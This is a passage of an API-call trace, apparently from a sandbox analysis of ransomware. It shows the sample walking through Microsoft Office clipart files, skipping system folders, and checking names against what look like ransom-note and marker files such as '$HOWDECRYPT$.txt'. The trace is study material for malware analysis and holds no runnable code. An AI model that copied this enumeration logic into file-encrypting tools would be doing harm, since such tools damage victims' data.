GetProcessHeap () returned 0x2c0000 [0097.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x388948 [0097.872] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x1fb8) returned 0x38a790 [0097.872] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.872] lstrcmpiW (lpString1="HM00114_.WMF", lpString2="Windows") returned -1 [0097.872] lstrlenW (lpString="Windows") returned 7 [0097.872] lstrcmpiW (lpString1="HM00114_.WMF", lpString2="$Recycle.bin") returned 1 [0097.872] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.872] lstrcmpiW (lpString1="HM00114_.WMF", lpString2="System Volume Information") returned -1 [0097.872] lstrlenW (lpString="System Volume Information") returned 25 [0097.872] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 67 [0097.873] StrStrIW (lpFirst="HM00114_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.873] lstrcmpW (lpString1="HM00114_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.873] lstrcmpW (lpString1="HM00114_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.873] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 67 [0097.873] GetProcessHeap () returned 0x2c0000 [0097.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x388a18 [0097.873] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x1fc0) returned 0x38a790 [0097.873] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.873] lstrcmpiW (lpString1="HM00116_.WMF", lpString2="Windows") returned -1 [0097.873] lstrlenW (lpString="Windows") returned 7 [0097.873] lstrcmpiW (lpString1="HM00116_.WMF", lpString2="$Recycle.bin") returned 1 [0097.873] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.873] lstrcmpiW (lpString1="HM00116_.WMF", lpString2="System Volume Information") returned -1 [0097.873] lstrlenW (lpString="System Volume Information") returned 25 [0097.873] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 67 [0097.873] StrStrIW (lpFirst="HM00116_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.873] lstrcmpW (lpString1="HM00116_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.873] lstrcmpW (lpString1="HM00116_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.873] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 67 [0097.873] GetProcessHeap () returned 0x2c0000 [0097.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x388ae8 [0097.873] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x1fc8) returned 0x38a790 [0097.874] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.874] lstrcmpiW (lpString1="HM00172_.WMF", lpString2="Windows") returned -1 [0097.874] lstrlenW (lpString="Windows") returned 7 [0097.874] lstrcmpiW (lpString1="HM00172_.WMF", lpString2="$Recycle.bin") returned 1 [0097.874] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.874] lstrcmpiW (lpString1="HM00172_.WMF", lpString2="System Volume Information") returned -1 [0097.874] lstrlenW (lpString="System Volume Information") returned 25 [0097.874] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 67 [0097.874] StrStrIW (lpFirst="HM00172_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.874] lstrcmpW (lpString1="HM00172_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.874] lstrcmpW (lpString1="HM00172_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.874] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 67 [0097.874] GetProcessHeap () returned 0x2c0000 [0097.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x388bb8 [0097.874] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x1fd0) returned 0x38a790 [0097.874] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.874] lstrcmpiW (lpString1="HM00426_.WMF", lpString2="Windows") returned -1 [0097.874] lstrlenW (lpString="Windows") returned 7 [0097.874] lstrcmpiW (lpString1="HM00426_.WMF", lpString2="$Recycle.bin") returned 1 [0097.874] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.874] lstrcmpiW (lpString1="HM00426_.WMF", lpString2="System Volume Information") returned -1 [0097.874] lstrlenW (lpString="System Volume Information") returned 25 [0097.875] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 67 [0097.875] StrStrIW (lpFirst="HM00426_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.875] lstrcmpW (lpString1="HM00426_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.875] lstrcmpW (lpString1="HM00426_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.875] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 67 [0097.875] GetProcessHeap () returned 0x2c0000 [0097.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x388c88 [0097.875] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x1fd8) returned 0x38a790 [0097.875] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.875] lstrcmpiW (lpString1="HTECH_01.MID", lpString2="Windows") returned -1 [0097.875] lstrlenW (lpString="Windows") returned 7 [0097.875] lstrcmpiW (lpString1="HTECH_01.MID", lpString2="$Recycle.bin") returned 1 [0097.875] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.875] lstrcmpiW (lpString1="HTECH_01.MID", lpString2="System Volume Information") returned -1 [0097.875] lstrlenW (lpString="System Volume Information") returned 25 [0097.875] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 67 [0097.875] StrStrIW (lpFirst="HTECH_01.MID", lpSrch=".spyhunter") returned 0x0 [0097.875] lstrcmpW (lpString1="HTECH_01.MID", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.875] lstrcmpW (lpString1="HTECH_01.MID", lpString2="_uninstalling_.png") returned 1 [0097.875] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 67 [0097.875] GetProcessHeap () returned 0x2c0000 [0097.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x388d58 [0097.876] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x1fe0) returned 0x38a790 [0097.876] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.876] lstrcmpiW (lpString1="IN00046_.WMF", lpString2="Windows") returned -1 [0097.876] lstrlenW (lpString="Windows") returned 7 [0097.876] lstrcmpiW (lpString1="IN00046_.WMF", lpString2="$Recycle.bin") returned 1 [0097.876] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.876] lstrcmpiW (lpString1="IN00046_.WMF", lpString2="System Volume Information") returned -1 [0097.876] lstrlenW (lpString="System Volume Information") returned 25 [0097.876] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 67 [0097.876] StrStrIW (lpFirst="IN00046_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.876] lstrcmpW (lpString1="IN00046_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.876] lstrcmpW (lpString1="IN00046_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.876] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 67 [0097.876] GetProcessHeap () returned 0x2c0000 [0097.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x388e28 [0097.876] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x1fe8) returned 0x38a790 [0097.876] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.876] lstrcmpiW (lpString1="IN00118_.WMF", lpString2="Windows") returned -1 [0097.876] lstrlenW (lpString="Windows") returned 7 [0097.876] lstrcmpiW (lpString1="IN00118_.WMF", lpString2="$Recycle.bin") returned 1 [0097.876] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.876] lstrcmpiW (lpString1="IN00118_.WMF", lpString2="System Volume Information") returned -1 [0097.877] lstrlenW (lpString="System Volume Information") returned 25 [0097.877] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 67 [0097.877] StrStrIW (lpFirst="IN00118_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.878] lstrcmpW (lpString1="IN00118_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.878] lstrcmpW (lpString1="IN00118_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.878] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 67 [0097.878] GetProcessHeap () returned 0x2c0000 [0097.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x388ef8 [0097.878] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x1ff0) returned 0x38a790 [0097.878] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.878] lstrcmpiW (lpString1="IN00177_.WMF", lpString2="Windows") returned -1 [0097.878] lstrlenW (lpString="Windows") returned 7 [0097.878] lstrcmpiW (lpString1="IN00177_.WMF", lpString2="$Recycle.bin") returned 1 [0097.878] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.878] lstrcmpiW (lpString1="IN00177_.WMF", lpString2="System Volume Information") returned -1 [0097.878] lstrlenW (lpString="System Volume Information") returned 25 [0097.879] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 67 [0097.879] StrStrIW (lpFirst="IN00177_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.879] lstrcmpW (lpString1="IN00177_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.879] lstrcmpW (lpString1="IN00177_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.879] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 67 [0097.879] GetProcessHeap () returned 0x2c0000 [0097.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x388fc8 [0097.879] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x1ff8) returned 0x38a790 [0097.879] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.879] lstrcmpiW (lpString1="IN00204_.WMF", lpString2="Windows") returned -1 [0097.879] lstrlenW (lpString="Windows") returned 7 [0097.879] lstrcmpiW (lpString1="IN00204_.WMF", lpString2="$Recycle.bin") returned 1 [0097.879] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.879] lstrcmpiW (lpString1="IN00204_.WMF", lpString2="System Volume Information") returned -1 [0097.879] lstrlenW (lpString="System Volume Information") returned 25 [0097.879] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 67 [0097.879] StrStrIW (lpFirst="IN00204_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.879] lstrcmpW (lpString1="IN00204_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.879] lstrcmpW (lpString1="IN00204_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.879] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 67 [0097.879] GetProcessHeap () returned 0x2c0000 [0097.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389098 [0097.880] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x2000) returned 0x38a790 [0097.880] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.880] lstrcmpiW (lpString1="IN00233_.WMF", lpString2="Windows") returned -1 [0097.880] lstrlenW (lpString="Windows") returned 7 [0097.880] lstrcmpiW (lpString1="IN00233_.WMF", lpString2="$Recycle.bin") returned 1 [0097.880] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.880] lstrcmpiW (lpString1="IN00233_.WMF", lpString2="System Volume Information") returned -1 [0097.880] lstrlenW (lpString="System Volume Information") returned 25 [0097.880] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 67 [0097.880] StrStrIW (lpFirst="IN00233_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.880] lstrcmpW (lpString1="IN00233_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.880] lstrcmpW (lpString1="IN00233_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.880] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 67 [0097.880] GetProcessHeap () returned 0x2c0000 [0097.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389168 [0097.880] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x2008) returned 0x38a790 [0097.880] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.880] lstrcmpiW (lpString1="IN00343_.WMF", lpString2="Windows") returned -1 [0097.880] lstrlenW (lpString="Windows") returned 7 [0097.880] lstrcmpiW (lpString1="IN00343_.WMF", lpString2="$Recycle.bin") returned 1 [0097.880] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.881] lstrcmpiW (lpString1="IN00343_.WMF", lpString2="System Volume Information") returned -1 [0097.881] lstrlenW (lpString="System Volume Information") returned 25 [0097.881] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 67 [0097.881] StrStrIW (lpFirst="IN00343_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.881] lstrcmpW (lpString1="IN00343_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.881] lstrcmpW (lpString1="IN00343_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.881] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 67 [0097.881] GetProcessHeap () returned 0x2c0000 [0097.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389238 [0097.881] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x2010) returned 0x38a790 [0097.881] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.909] lstrcmpiW (lpString1="IN00346_.WMF", lpString2="Windows") returned -1 [0097.910] lstrlenW (lpString="Windows") returned 7 [0097.910] lstrcmpiW (lpString1="IN00346_.WMF", lpString2="$Recycle.bin") returned 1 [0097.910] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.910] lstrcmpiW (lpString1="IN00346_.WMF", lpString2="System Volume Information") returned -1 [0097.910] lstrlenW (lpString="System Volume Information") returned 25 [0097.910] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 67 [0097.910] StrStrIW (lpFirst="IN00346_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.910] lstrcmpW (lpString1="IN00346_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.910] lstrcmpW (lpString1="IN00346_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.910] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 67 [0097.910] GetProcessHeap () returned 0x2c0000 [0097.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2f7b8 [0097.910] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x2010) returned 0x38a790 [0097.910] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.910] lstrcmpiW (lpString1="IN00351_.WMF", lpString2="Windows") returned -1 [0097.910] lstrlenW (lpString="Windows") returned 7 [0097.910] lstrcmpiW (lpString1="IN00351_.WMF", lpString2="$Recycle.bin") returned 1 [0097.910] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.910] lstrcmpiW (lpString1="IN00351_.WMF", lpString2="System Volume Information") returned -1 [0097.910] lstrlenW (lpString="System Volume Information") returned 25 [0097.910] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 67 [0097.911] StrStrIW (lpFirst="IN00351_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.911] lstrcmpW (lpString1="IN00351_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.911] lstrcmpW (lpString1="IN00351_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.911] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 67 [0097.911] GetProcessHeap () returned 0x2c0000 [0097.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389308 [0097.911] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x38a790, Size=0x2018) returned 0x2c16890 [0097.911] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.911] lstrcmpiW (lpString1="IN00557_.WMF", lpString2="Windows") returned -1 [0097.911] lstrlenW (lpString="Windows") returned 7 [0097.911] lstrcmpiW (lpString1="IN00557_.WMF", lpString2="$Recycle.bin") returned 1 [0097.911] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.911] lstrcmpiW (lpString1="IN00557_.WMF", lpString2="System Volume Information") returned -1 [0097.911] lstrlenW (lpString="System Volume Information") returned 25 [0097.911] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 67 [0097.911] StrStrIW (lpFirst="IN00557_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.911] lstrcmpW (lpString1="IN00557_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.911] lstrcmpW (lpString1="IN00557_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.911] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 67 [0097.911] GetProcessHeap () returned 0x2c0000 [0097.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3893d8 [0097.911] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2020) returned 0x2c16890 [0097.912] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.912] lstrcmpiW (lpString1="IN00915_.WMF", lpString2="Windows") returned -1 [0097.912] lstrlenW (lpString="Windows") returned 7 [0097.912] lstrcmpiW (lpString1="IN00915_.WMF", lpString2="$Recycle.bin") returned 1 [0097.912] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.912] lstrcmpiW (lpString1="IN00915_.WMF", lpString2="System Volume Information") returned -1 [0097.912] lstrlenW (lpString="System Volume Information") returned 25 [0097.912] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 67 [0097.912] StrStrIW (lpFirst="IN00915_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.912] lstrcmpW (lpString1="IN00915_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.912] lstrcmpW (lpString1="IN00915_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.912] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 67 [0097.912] GetProcessHeap () returned 0x2c0000 [0097.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3894a8 [0097.912] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2028) returned 0x2c16890 [0097.912] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.912] lstrcmpiW (lpString1="IN00919_.WMF", lpString2="Windows") returned -1 [0097.912] lstrlenW (lpString="Windows") returned 7 [0097.912] lstrcmpiW (lpString1="IN00919_.WMF", lpString2="$Recycle.bin") returned 1 [0097.912] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.912] lstrcmpiW (lpString1="IN00919_.WMF", lpString2="System Volume Information") returned -1 [0097.912] lstrlenW (lpString="System Volume Information") returned 25 [0097.913] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 67 [0097.913] StrStrIW (lpFirst="IN00919_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.913] lstrcmpW (lpString1="IN00919_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.913] lstrcmpW (lpString1="IN00919_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.913] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 67 [0097.913] GetProcessHeap () returned 0x2c0000 [0097.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389578 [0097.913] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2030) returned 0x2c16890 [0097.913] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.913] lstrcmpiW (lpString1="IN00956_.WMF", lpString2="Windows") returned -1 [0097.913] lstrlenW (lpString="Windows") returned 7 [0097.913] lstrcmpiW (lpString1="IN00956_.WMF", lpString2="$Recycle.bin") returned 1 [0097.913] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.913] lstrcmpiW (lpString1="IN00956_.WMF", lpString2="System Volume Information") returned -1 [0097.913] lstrlenW (lpString="System Volume Information") returned 25 [0097.913] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 67 [0097.913] StrStrIW (lpFirst="IN00956_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.913] lstrcmpW (lpString1="IN00956_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.913] lstrcmpW (lpString1="IN00956_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.913] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 67 [0097.913] GetProcessHeap () returned 0x2c0000 [0097.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389648 [0097.914] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2038) returned 0x2c16890 [0097.914] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.914] lstrcmpiW (lpString1="IN00957_.WMF", lpString2="Windows") returned -1 [0097.914] lstrlenW (lpString="Windows") returned 7 [0097.914] lstrcmpiW (lpString1="IN00957_.WMF", lpString2="$Recycle.bin") returned 1 [0097.914] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.914] lstrcmpiW (lpString1="IN00957_.WMF", lpString2="System Volume Information") returned -1 [0097.914] lstrlenW (lpString="System Volume Information") returned 25 [0097.914] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 67 [0097.914] StrStrIW (lpFirst="IN00957_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.914] lstrcmpW (lpString1="IN00957_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.914] lstrcmpW (lpString1="IN00957_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.914] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 67 [0097.914] GetProcessHeap () returned 0x2c0000 [0097.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389718 [0097.914] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2040) returned 0x2c16890 [0097.914] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.914] lstrcmpiW (lpString1="INDST_01.MID", lpString2="Windows") returned -1 [0097.914] lstrlenW (lpString="Windows") returned 7 [0097.914] lstrcmpiW (lpString1="INDST_01.MID", lpString2="$Recycle.bin") returned 1 [0097.915] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.915] lstrcmpiW (lpString1="INDST_01.MID", lpString2="System Volume Information") returned -1 [0097.915] lstrlenW (lpString="System Volume Information") returned 25 [0097.915] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 67 [0097.915] StrStrIW (lpFirst="INDST_01.MID", lpSrch=".spyhunter") returned 0x0 [0097.915] lstrcmpW (lpString1="INDST_01.MID", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.915] lstrcmpW (lpString1="INDST_01.MID", lpString2="_uninstalling_.png") returned 1 [0097.915] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 67 [0097.915] GetProcessHeap () returned 0x2c0000 [0097.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3897e8 [0097.915] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2048) returned 0x2c16890 [0097.915] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.915] lstrcmpiW 